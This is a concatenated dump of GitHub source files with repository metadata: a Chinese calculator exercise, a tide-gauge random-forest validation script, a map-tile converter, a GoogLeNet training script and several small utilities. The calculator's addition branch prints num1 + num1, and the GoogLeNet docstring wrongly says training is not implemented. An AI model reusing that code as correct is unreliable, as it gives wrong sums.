sin(self._theta) * sin(self._phi)],
np.float32)
self._position = self._pivot + self._radius * self._rotation
self.view = look_at(self._position, self._pivot, self._up)
| [
"pyplex@github.com"
] | pyplex@github.com |
2dc5069739fbc75160cb5599b04da652d5d2581b | d8af7c6372aff57012c80d3b8a9dfaab81499f71 | /AIDStudy/01-PythonBase/day03/exercise03.py | 92c88709cd7037da27f1e3b4872d4cc81434046a | [] | no_license | fanxiao168/pythonStudy | 4843c56019b8f997fd7fc566904a9e0162e9a541 | f94e2238d40c41ee54ff4184c500d659c6820c03 | refs/heads/master | 2021-02-04T20:54:10.850770 | 2020-05-28T08:55:35 | 2020-05-28T08:55:35 | 243,708,800 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 548 | py | # 输入一个数字
# 再输入一个运算符 + - * /
# 最后输入另外一个数字
# 根据运算符计算两个数字
# 要求 如果运算符 不是加减乘除 提示运算符有误
num1 = float(input('请输入第一个数:'))
op = input('请输入运算符:')
num2 = float(input('请输入第二个数:'))
# 判断 如果用户输入的内容是+
if op == '+':
print(num1 + num1)
elif op == '-':
print(num1 - num2)
elif op == '*':
print(num1 * num2)
elif op == '/':
print(num1 / num2)
else:
print('运算符有误')
| [
"fanxiao168@126.com"
] | fanxiao168@126.com |
ab0399b72847499a6f1bc5c6da365a5ce12362f2 | bc97fab684295fa362ab38cb79c2a0a36c565529 | /routes/__init__.py | a1c60b73d6b70d8a876c4b518dfce803a4767fd1 | [] | no_license | GDGVIT/chatapp | 80422a6ce09eba24c2a211fd1414fbeeb24f8692 | 8589d1cbc2176c6c95e365953497e56309bc5c07 | refs/heads/master | 2021-01-13T09:11:08.387588 | 2016-10-28T06:26:15 | 2016-10-28T06:26:15 | 68,836,814 | 3 | 3 | null | 2016-10-14T18:26:36 | 2016-09-21T16:33:53 | Python | UTF-8 | Python | false | false | 79 | py | from controllers import *
route=[
(
r"/faq",
chat.QuestionHandler
)
]
| [
"shubham.bhardwaj2015@vit.ac.in"
] | shubham.bhardwaj2015@vit.ac.in |
37fc610c21e71bf7723717c2eab70e6d67051308 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/1/bDf.py | 66f9bf27ac4a73ccf9b45ac269ebdf3aded004b7 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'bDF':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
8fbfc6b612875791ee39f0aab8bb242440512264 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merraRF882/272-tideGauge.py | d58ed71fbe716fd71749b6198acfe2f3b5ed6343 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,456 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 272
y = 273
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
#filter only .csv files
tgNames = []
for file in glob.glob("*.csv"):
tgNames.append(file)
tg_name = sorted(tgNames)[tg]
print(tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
print("this tide gauge is already taken care of")
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
min_samples_leaf = 1)
rf.fit(X_train, y_train)
#predictions
predictions = rf.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
print()
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#run script
validateRF()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
120402a3318b661368d53aa0f4f1e993bef44455 | 19d43b8c175bb5304393cf9c259eacb7110dd4fc | /objectModel/Python/cdm/utilities/event_callback.py | e7c5744ba710772abc5530e73121d00b2f7291de | [
"CC-BY-4.0",
"MIT"
] | permissive | bissont/CDM | 3fd814566ea1bf9d19e300cd5b438b384ce4bcba | 0cffb140e0b41e526be072b547cae91a03c4cd6f | refs/heads/master | 2020-12-29T12:55:23.822187 | 2020-02-05T02:19:27 | 2020-02-05T02:19:27 | 238,614,156 | 1 | 0 | null | 2020-02-06T05:21:51 | 2020-02-06T05:21:50 | null | UTF-8 | Python | false | false | 161 | py | from typing import Callable, TYPE_CHECKING
if TYPE_CHECKING:
from cdm.enums import CdmStatusLevel
EventCallback = Callable[['CdmStatusLevel', str], None]
| [
"nebanfic@microsoft.com"
] | nebanfic@microsoft.com |
4d86c8a9d2eea6877b3ae62aab7674df7906b1f3 | 204f3779f22cc66ff5adb8753ccde53eb2550f95 | /dem-preprocessing/tiler-tools/tiles_convert.py | a27b9f1d120449d269e91c19f0e5b77508a345bc | [
"MIT"
] | permissive | ghelobytes/ol3-dem | 6f8e2a9ba0721fdcda1ed251bad2daeb1f150f79 | 445fc04d0b5b8990bf404eceed6bfc79d084e93c | refs/heads/master | 2020-12-28T21:28:09.410426 | 2014-01-01T03:25:38 | 2014-01-01T03:25:38 | 15,589,948 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,596 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (c) 2010, 2013 Vadim Shlyakhov
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
import logging
import optparse
from tiler_functions import *
from converter_backend import TileSet, TileConverter
import converter_xyz
import converter_maemomapper
import converter_sasplanet
try:
import converter_mmap
except ImportError:
pass
#~ import rpdb2; rpdb2.start_embedded_debugger('nRAmgJHm')
#----------------------------
def convert(src_lst, options):
#----------------------------
in_class = TileSet.get_class(options.in_fmt, isDest=False)
out_class = TileSet.get_class(options.out_fmt, isDest=True)
for src in src_lst:
src_tile_set = in_class(src, options)
out_class(options=options, src=src_tile_set).convert()
#----------------------------
def main(argv):
#----------------------------
parser = optparse.OptionParser(
usage='usage: %prog [<options>...] <source>...',
version=version,
description='copies map tiles from one structure to another')
parser.add_option('--from', dest='in_fmt', default='zyx',
help='input tiles profile (default: zyx)')
parser.add_option('--to', dest='out_fmt', default='mmap',
help='output tiles profile (default: mmap)')
parser.add_option('--list-profiles', '--lp', action='store_true',
help='list available profiles')
parser.add_option('-f', '--tile-format', dest='convert_tile', metavar='FORMAT',
help='convert output tiles to format (default: no conversion)')
parser.add_option('--list-formats', '--lf', action='store_true',
help='list tile format converters')
parser.add_option("-n", "--colors", dest="colors", default='256',
help='Specifies the number of colors for pngnq profile (default: 256)')
parser.add_option("-q", "--quality", dest="quality", type="int", default=75,
help='JPEG/WEBP quality (default: 75)')
parser.add_option('-a', '--append', action='store_true', dest='append',
help='append tiles to an existing destination')
parser.add_option('-r', '--remove-dest', action='store_true',dest='remove_dest',
help='delete destination directory before merging')
parser.add_option('-t', '--dest-dir', default='.', dest='dst_dir',
help='destination directory (default: current)')
parser.add_option('--name', default=None,
help='layer name (default: derived from the source)')
parser.add_option('--description', metavar='TXT', default='',
help='layer decription (default: None)')
parser.add_option('--overlay', action='store_true',
help='non-base layer (default: False)')
parser.add_option('--url', default=None,
help='URL template (default: None)')
parser.add_option('--link', action='store_true', dest='link',
help='make links to source tiles instead of copying if possible')
parser.add_option("--srs", default='EPSG:3857', dest="tiles_srs",
help="code of a spatial reference system of a tile set (default is EPSG:3857, aka EPSG:900913)")
parser.add_option("--proj4def", default=None, metavar="PROJ4_SRS",
help="proj4 definition for the SRS")
parser.add_option('-z', '--zoom', default=None,metavar='ZOOM_LIST',
help='list of zoom ranges to process')
parser.add_option('-g', '--region', default=None, metavar='DATASOURCE',
help='region to process (OGR shape or Sasplanet .hlg)')
parser.add_option('--region-zoom', metavar='N', type="int", default=None,
help='apply region for zooms only higher than this one (default: None)')
parser.add_option("--nothreads", action="store_true",
help="do not use multiprocessing")
parser.add_option('-d', '--debug', action='store_true', dest='debug')
parser.add_option('--quiet', action='store_true', dest='quiet')
#~ global options
(options, args) = parser.parse_args(argv[1:])
logging.basicConfig(level=logging.DEBUG if options.debug else
(logging.ERROR if options.quiet else logging.INFO))
log(options.__dict__)
if options.list_profiles:
TileSet.list_profiles()
sys.exit(0)
if options.list_formats:
TileConverter.list_tile_converters()
sys.exit(0)
src_lst=args
convert(src_lst, LooseDict(options))
# main()
if __name__ == '__main__':
main(sys.argv)
| [
"s.brandt@riseup.net"
] | s.brandt@riseup.net |
f32647ff11ea96ce75acd8b91328bd999dbfe6f8 | 0689ad04900b45e6ffb85756e65e96f30781558b | /pbase/AID1805/第一阶段 python基础/day09/exercise/myrange.py | 4ae87496e8ca3ec1985a84cbd655a11e0690f4a1 | [] | no_license | lizhihui16/aaa | a5452b5d0de4c2ad6342fce1b8aef278d2d2943e | e8c38e012f6aa0bc05ac6481d6c3e2b4e9013b56 | refs/heads/master | 2020-04-24T01:05:19.266060 | 2019-02-20T01:43:51 | 2019-02-20T01:43:51 | 171,586,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # 2. 写一个 myrange函数,参数可以传1~3个,实际意义同range函数规则相同,此函数返回符合range(...) 函数规则的列表
# 如:
# L = myrange(4)
# print(L) # [0, 1, 2, 3]
# L = myrange(4, 6)
# print(L) # [4, 5]
# L = myrange(1, 10, 3)
# print(L) # [1, 4, 7]
# 方法1
# def myrange(start, stop=None, step=1):
# r_lst = [] # 即将返回的列表
# # 调整三个形参的值
# if stop is None:
# stop = start
# start = 0
# if step > 0:
# while start < stop:
# r_lst.append(start) # 把当前数加入到列表中
# start += step # 让start 向后移动,准备下次操作
# else: # 当步长小于0的情况
# for x in range(start, stop, step):
# r_lst.append(x)
# # 此处把符合条件的数据加到列表r_lst中
# return r_lst
# 方法2
def myrange(start, stop=None, step=1):
# 调整三个形参的值
if stop is None:
stop = start
start = 0
return list(range(start, stop, step))
L = myrange(4)
print(L) # [0, 1, 2, 3]
L = myrange(4, 6)
print(L) # [4, 5]
L = myrange(1, 10, 3)
print(L) # [1, 4, 7]
L = myrange(10, 1, -3)
print(L)
| [
"tarena@tedu.cn"
] | tarena@tedu.cn |
f2ee8ed0f141c3f878bd554027310f7d960f5054 | 222ead89dd6615e4721f389cc53a76750b15b8c5 | /examples/imagenet/train.py | 9f0a4c4a0d2ee4592076d819f375d1fadf2dcd5d | [
"Apache-2.0"
] | permissive | changyu98/GoogLeNet-PyTorch | d577fb0384b908445f27dd8589037c594c9a19d4 | a2fae2b8b14e830a3f64c81bc4e62dadb6cfe5b7 | refs/heads/master | 2021-01-05T13:39:49.885271 | 2020-01-15T13:56:40 | 2020-01-15T13:56:40 | 241,038,261 | 1 | 0 | Apache-2.0 | 2020-02-17T06:47:16 | 2020-02-17T06:47:15 | null | UTF-8 | Python | false | false | 16,817 | py | # Copyright 2020 Lorna Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Evaluate on GoogLeNet. Note that at the moment, training is not implemented (I am working on it).
that being said, evaluation is working.
"""
import argparse
import os
import random
import shutil
import time
import warnings
import PIL
import torch
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.parallel
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from googlenet import GoogLeNet
from googlenet.utils import accuracy
from googlenet.utils import adjust_learning_rate
from googlenet.utils import AverageMeter
from googlenet.utils import get_parameter_number
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('data', metavar='DIR',
help='path to dataset')
parser.add_argument('-a', '--arch', metavar='ARCH', default='googlenet',
help='model architecture (default: googlenet)')
parser.add_argument('-j', '--workers', default=1, type=int, metavar='N',
help='number of data loading workers (default: 1)')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=256, type=int,
metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr', '--learning-rate', default=0.01, type=float,
metavar='LR', help='initial learning rate', dest='lr')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--wd', '--weight-decay', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)',
dest='weight_decay')
parser.add_argument('-p', '--print-freq', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', action='store_true',
help='use pre-trained model')
parser.add_argument('--world-size', default=-1, type=int,
help='number of nodes for distributed training')
parser.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
parser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,
help='url used to set up distributed training')
parser.add_argument('--dist-backend', default='nccl', type=str,
help='distributed backend')
parser.add_argument('--seed', default=None, type=int,
help='seed for initializing training. ')
parser.add_argument('--gpu', default=0, type=int,
help='GPU id to use.')
parser.add_argument('--image_size', default=224, type=int,
help='image size')
parser.add_argument('--num_classes', type=int, default=1000,
help="number of dataset category.")
parser.add_argument('--multiprocessing-distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
best_acc1 = 0
def main():
args = parser.parse_args()
if args.seed is not None:
random.seed(args.seed)
torch.manual_seed(args.seed)
cudnn.deterministic = True
warnings.warn('You have chosen to seed training. '
'This will turn on the CUDNN deterministic setting, '
'which can slow down your training considerably! '
'You may see unexpected behavior when restarting '
'from checkpoints.')
if args.gpu is not None:
warnings.warn('You have chosen a specific GPU. This will completely '
'disable data parallelism.')
if args.dist_url == "env://" and args.world_size == -1:
args.world_size = int(os.environ["WORLD_SIZE"])
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
ngpus_per_node = torch.cuda.device_count()
if args.multiprocessing_distributed:
# Since we have ngpus_per_node processes per node, the total world_size
# needs to be adjusted accordingly
args.world_size = ngpus_per_node * args.world_size
# Use torch.multiprocessing.spawn to launch distributed processes: the
# main_worker process function
mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
else:
# Simply call main_worker function
main_worker(args.gpu, ngpus_per_node, args)
def main_worker(gpu, ngpus_per_node, args):
global best_acc1
args.gpu = gpu
if args.gpu is not None:
print("Use GPU: {} for training".format(args.gpu))
if args.distributed:
if args.dist_url == "env://" and args.rank == -1:
args.rank = int(os.environ["RANK"])
if args.multiprocessing_distributed:
# For multiprocessing distributed training, rank needs to be the
# global rank among all the processes
args.rank = args.rank * ngpus_per_node + gpu
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
# create model
if 'googlenet' in args.arch: # NEW
if args.pretrained:
model = GoogLeNet.from_pretrained(args.arch, num_classes=args.num_classes)
print("=> using pre-trained model '{}'".format(args.arch))
else:
print("=> creating model '{}'".format(args.arch))
model = GoogLeNet.from_name(args.arch, args.resume, num_classes=args.num_classes)
else:
warnings.warn("Plesase --arch googlenet.")
if args.distributed:
# For multiprocessing distributed, DistributedDataParallel constructor
# should always set the single device scope, otherwise,
# DistributedDataParallel will use all available devices.
if args.gpu is not None:
torch.cuda.set_device(args.gpu)
model.cuda(args.gpu)
# When using a single GPU per process and per
# DistributedDataParallel, we need to divide the batch size
# ourselves based on the total number of GPUs we have
args.batch_size = int(args.batch_size / ngpus_per_node)
args.workers = int(args.workers / ngpus_per_node)
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
else:
model.cuda()
# DistributedDataParallel will divide and allocate batch_size to all
# available GPUs if device_ids are not set
model = torch.nn.parallel.DistributedDataParallel(model)
elif args.gpu is not None:
torch.cuda.set_device(args.gpu)
model = model.cuda(args.gpu)
else:
# DataParallel will divide and allocate batch_size to all available
# GPUs
if args.arch.startswith('googlenet'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
get_parameter_number(model)
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(args.gpu)
optimizer = torch.optim.SGD(model.parameters(), args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print(f"=> loading checkpoint '{args.resume}'")
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_acc1 = checkpoint['best_acc1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print(f"=> loaded checkpoint '{args.resume}' (epoch {checkpoint['epoch']})")
else:
print(f"=> no checkpoint found at '{args.resume}'")
cudnn.benchmark = True
# Data loading code
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'test')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
train_dataset = datasets.ImageFolder(
traindir,
transform=transforms.Compose([
transforms.RandomResizedCrop(args.image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]))
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
if 'googlenet' in args.arch:
image_size = 224
val_transforms = transforms.Compose([
transforms.Resize(image_size, interpolation=PIL.Image.BICUBIC),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
])
print('Using image size', image_size)
else:
val_transforms = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])
print('Using image size', 224)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, val_transforms),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
if args.evaluate:
res1, res5 = validate(val_loader, model, criterion, args)
with open('res.txt', 'w') as f:
print(f"Acc@1: {res1}\tAcc@5: {res5}", file=f)
return
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
adjust_learning_rate(optimizer, epoch, args)
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch, args)
# evaluate on validation set
acc1, _ = validate(val_loader, model, criterion, args)
# remember best acc@1 and save checkpoint
is_best = acc1 > best_acc1
best_acc1 = max(acc1, best_acc1)
if not args.multiprocessing_distributed or (args.multiprocessing_distributed
and args.rank % ngpus_per_node == 0):
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
}, is_best)
def train(train_loader, model, criterion, optimizer, epoch, args):
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':4.4f')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(len(train_loader), batch_time, data_time, losses, top1,
top5, prefix="Epoch: [{}]".format(epoch))
# switch to train mode
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
# compute output
output = model(images)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1.item(), images.size(0))
top5.update(acc5.item(), images.size(0))
# compute gradient and do Adam step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.print(i)
def validate(val_loader, model, criterion, args):
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':4.4f')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(len(val_loader), batch_time, losses, top1, top5,
prefix='Test: ')
# switch to evaluate mode
model.eval()
with torch.no_grad():
end = time.time()
for i, (images, target) in enumerate(val_loader):
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
# compute output
output = model(images)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1.item(), images.size(0))
top5.update(acc5.item(), images.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.print(i)
print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg, top5.avg
def save_checkpoint(state, is_best, filename='checkpoint.pth'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, *meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def print(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
@staticmethod
def _get_batch_fmtstr(num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
if __name__ == '__main__':
main()
| [
"liuchangyu1111@gmail.com"
] | liuchangyu1111@gmail.com |
8d885ef2e93980e5def6f244100248ff3d8b56d7 | 199eb36ba39440723db98e391ef7cea4abece1df | /chapter-2/linked_list.py | e4f855987e1c94b34bbca8c61bdf566e2435feea | [] | no_license | wahabtobibello/coding-challenges | eb187c657434d5c432bb77d72cab193fd61b4839 | d968711e76c717b5d18f288a4585aaef93118b8f | refs/heads/master | 2023-04-27T18:13:45.650392 | 2018-12-02T14:31:44 | 2018-12-02T14:31:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | class Node():
def __init__(self, data, next=None):
self.data = data
self.next = next
class LinkedList():
def __init__(self, arr):
self.head = Node(arr[0])
node = self.head
for i in range(1, len(arr)):
end = Node(arr[i])
node.next = end
node = end
def append_to_tail(self, data):
end = Node(data)
node = self.head
while node.next != None:
node = node.next
node.next = end
def print_linked_list(linked_list):
node = linked_list.head
output = [str(node.data)]
while node.next != None:
output.append(str(node.next.data))
node = node.next
print('->'.join(output))
| [
"tobibello001@gmail.com"
] | tobibello001@gmail.com |
